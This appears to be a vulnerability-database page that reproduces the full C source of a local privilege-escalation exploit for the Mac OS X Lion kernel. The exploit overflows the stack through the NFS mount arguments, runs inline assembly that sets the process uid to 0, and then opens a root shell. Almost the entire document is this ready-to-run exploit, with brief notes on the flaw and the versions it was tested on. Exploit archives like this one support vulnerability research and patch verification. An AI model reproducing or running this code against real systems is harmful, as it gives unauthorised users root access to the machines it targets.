Lucene search
K

Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

Apple Mac OS X Lion Kernel xnu-1699.32.7 NFS Privilege Escalation Exploi

Code

                                                /*
 * Apple Mac OS X Lion Kernel &#60;=  xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
 * CVE None
 * by Kenzley Alphonse &#60;kenzley [dot] alphonse [at] gmail [dot] com&#62;
 *
 *
 * Notes:
 *	This exploit leverage a stack overflow vulnerability to escalate privileges.
 *	The vulnerable function nfs_convert_old_nfs_args does not verify the size 
 *	of a user-provided argument before copying it to the stack. As a result by
 *	passing a large size, a local user can overwrite the stack with arbitrary 
 *	content.
 *
 * Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
 * Tested on Max OS X Lion xnu-1699.32.7  (x86_64)
 *
 *   Greets to taviso, spender, joberheide
 */
 
#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;strings.h&#62;
#include &#60;errno.h&#62;
#include &#60;sys/mman.h&#62;
#include &#60;sys/mount.h&#62;
#include &#60;sys/param.h&#62;
#include &#60;sys/stat.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;unistd.h&#62;
 
/** change these to fit your environment if needed **/
#define SSIZE		(536)
 
/** struct user_nfs_args was copied directly from &#34;/bsd/nfs/nfs.h&#34; of the xnu kernel **/
struct user_nfs_args {
	int		version;	/* args structure version number */
	char*	addr __attribute__((aligned(8)));		/* file server address */
	int		addrlen;	/* length of address */
	int		sotype;		/* Socket type */
	int		proto;		/* and Protocol */
	char *	fh __attribute__((aligned(8)));		/* File handle to be mounted */
	int		fhsize;		/* Size, in bytes, of fh */
	int		flags;		/* flags */
	int		wsize;		/* write size in bytes */
	int		rsize;		/* read size in bytes */
	int		readdirsize;	/* readdir size in bytes */
	int		timeo;		/* initial timeout in .1 secs */
	int		retrans;	/* times to retry send */
	int		maxgrouplist;	/* Max. size of group list */
	int		readahead;	/* # of blocks to readahead */
	int		leaseterm;	/* obsolete: Term (sec) of lease */
	int		deadthresh;	/* obsolete: Retrans threshold */
	char*	hostname __attribute__((aligned(8)));	/* server&#39;s name */
	/* NFS_ARGSVERSION 3 ends here */
	int		acregmin;	/* reg file min attr cache timeout */
	int		acregmax;	/* reg file max attr cache timeout */
	int		acdirmin;	/* dir min attr cache timeout */
	int		acdirmax;	/* dir max attr cache timeout */
	/* NFS_ARGSVERSION 4 ends here */
	uint	auth;		/* security mechanism flavor */
	/* NFS_ARGSVERSION 5 ends here */
	uint	deadtimeout;	/* secs until unresponsive mount considered dead */
};
 
/** sets the uid for the current process  and safely exits from the kernel**/
static void r00t_me() {
	asm(
		// padding
		&#34;nop; nop; nop; nop;&#34;
 
		// task_t %rax = current_task()
		&#34;movq	%%gs:0x00000008, %%rax;&#34;
		&#34;movq	0x00000348(%%rax), %%rax;&#34;
		
		// proc %rax = get_bsdtask_info()
		&#34;movq	0x000002d8(%%rax),%%rax;&#34;
		
		// ucred location at proc
		&#34;movq	0x000000d0(%%rax),%%rax;&#34;
		
		// uid = 0
		&#34;xorl	%%edi, %%edi;&#34;		
		&#34;movl	%%edi, 0x0000001c(%%rax);&#34;
		&#34;movl	%%edi, 0x00000020(%%rax);&#34;
		
		// fix the stack pointer and return (EACCES)
		&#34;movq	$13, %%rax;&#34;
		&#34;addq	$0x00000308,%%rsp;&#34;
		&#34;popq	%%rbx;&#34;
		&#34;popq	%%r12;&#34;
		&#34;popq	%%r13;&#34;
		&#34;popq	%%r14;&#34;
		&#34;popq	%%r15;&#34;
		&#34;popq	%%rbp;&#34;
		&#34;ret;&#34;
		:::&#34;%rax&#34;
	);
}
 
int main(int argc, char ** argv) {
	struct user_nfs_args xdrbuf;
	char * path;
	char obuf[SSIZE];
 
 
	/** clear the arguments **/
	memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
	memset(obuf, 0x00, SSIZE);
 
	/** set up variable to get path to vulnerable code **/
	xdrbuf.version = 3;
	xdrbuf.hostname = &#34;localhost&#34;;
	xdrbuf.addrlen = SSIZE;
	xdrbuf.addr = obuf;
	
	/** set ret address **/
	*(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
	printf(&#34;[*] set ret = 0x%.16lx\n&#34;, *(unsigned long *)&obuf[528]);
		
	/** create a unique tmp name **/
	if ((path = tmpnam(NULL)) == NULL) {
		// path can be any directory which we have read/write/exec access
		// but I&#39;d much rather create one instead of searching for one
		perror(&#34;[-] tmpnam&#34;);
		exit(EXIT_FAILURE);
	}
	
	/** make the path in tmp so that we can use it **/
	if (mkdir(path, 0660) &#60; 0) {
		perror(&#34;[-] mkdir&#34;);
		exit(EXIT_FAILURE);
	}
	
	/** inform the user that the path was created **/
	printf(&#34;[*] created sploit path%s\n&#34;, path);
	
	/** call the vulnerable function **/
	if (mount(&#34;nfs&#34;, path, 0, &xdrbuf) &#60; 0) {
		if (errno == EACCES) {
			puts(&#34;[+] escalating privileges...&#34;);
		} else {
			perror(&#34;[-] mount&#34;);
		}
		
	}
	
	/** clean up tmp dir **/
	if (rmdir(path) &#60; 0) {
		perror(&#34;[-] rmdir&#34;);
	}
	
	/** check if privs are equal to root **/
	if (getuid() != 0) {
		puts(&#34;[-] priviledge escalation failed&#34;);
		exit(EXIT_FAILURE);
	}
	
	/** get root shell **/
	printf(&#34;[+] We are now uid=%i ... your welcome!\n&#34;, getuid());
	printf(&#34;[+] Dropping a shell.\n&#34;);
	execl(&#34;/bin/sh&#34;, &#34;/bin/sh&#34;, NULL);
	return 0;
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
12